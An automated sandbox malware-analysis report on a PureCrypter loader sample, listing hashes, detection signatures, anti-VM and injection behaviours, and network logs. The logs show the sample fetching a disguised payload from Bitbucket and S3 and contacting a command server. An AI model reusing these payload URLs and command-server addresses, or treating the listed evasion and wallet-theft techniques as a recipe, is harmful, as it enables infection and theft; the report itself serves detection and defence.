Windows Analysis Report
hvnc-CR-SCR-0710.bin.exe

Overview

General Information

Sample name: hvnc-CR-SCR-0710.bin.exe
Analysis ID: 1532602
MD5: 177136a947a8677c09fc4c9891b18dde
SHA1: cc5dbbaa959a97603e6a647e25f7de47777cc6c3
SHA256: adbca36fa3dab9cbc2ba34e3343c2cb6726ea5ef0064b293a01a1f396a454264
Tags: exehvncuser-01Xyris

Detection

PureCrypter
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
AI detected suspicious sample
Detected PureCrypter Trojan
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI, often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: PureCrypter
Description: According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021. The malware has been observed distributing a variety of remote access trojans and information stealers. The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products. PureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google's Protocol Buffer message format.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

AV Detection

Source: C:\Users\user\AppData\Roaming\msql2.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\msql2.exe Virustotal: Detection: 34%
Source: hvnc-CR-SCR-0710.bin.exe ReversingLabs: Detection: 26%
Source: hvnc-CR-SCR-0710.bin.exe Virustotal: Detection: 34%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\msql2.exe Joe Sandbox ML: detected
Source: hvnc-CR-SCR-0710.bin.exe Joe Sandbox ML: detected
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.95:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.90.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.231.232.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 0_2_064E0168
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 0_2_064E11D8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 0_2_064E11D0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4EB1h 0_2_064F4E50
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064FCEE8h 0_2_064FCE28
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064FCEE8h 0_2_064FCE30
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4388h 0_2_064F42F0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4388h 0_2_064F4300
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4EB1h 0_2_064F502C
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_0651D428
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 2_2_060E0168
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 2_2_060E11D8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 2_2_060E11D0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4EB1h 2_2_060F4E17
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060FCEE8h 2_2_060FCE28
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060FCEE8h 2_2_060FCE30
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4EB1h 2_2_060F4E50
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4388h 2_2_060F42F0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4388h 2_2_060F4300
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4EB1h 2_2_060F502C
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 2_2_0611D428
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 5_2_06AE11D8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 5_2_06AE11D0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 5_2_06AE0168
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AFCEE8h 5_2_06AFCE28
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AFCEE8h 5_2_06AFCE30
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4EB1h 5_2_06AF4E17
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4EB1h 5_2_06AF4E50
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4388h 5_2_06AF42F0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4388h 5_2_06AF4300
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4EB1h 5_2_06AF502C
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 5_2_06B1D428

Networking

Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 31.41.244.211:56001 -> 192.168.2.4:49732
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 31.41.244.211:56001
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.166.143.49
Source: Joe Sandbox View ASN Name: AEROEXPRESS-ASRU
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1 Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: InstallUtil.exe, 00000001.00000002.4146654495.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: InstallUtil.exe, 00000001.00000002.4146654495.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: InstallUtil.exe, 00000001.00000002.4168769540.00000000055B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d3522d218ade2
